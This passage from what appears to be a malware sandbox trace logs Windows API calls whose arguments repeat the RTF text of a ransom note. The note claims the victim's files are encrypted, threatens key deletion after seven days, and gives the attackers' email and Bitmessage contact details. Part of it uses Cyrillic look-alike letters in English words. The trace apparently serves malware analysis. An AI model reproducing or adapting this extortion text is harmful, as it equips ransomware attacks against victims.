h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 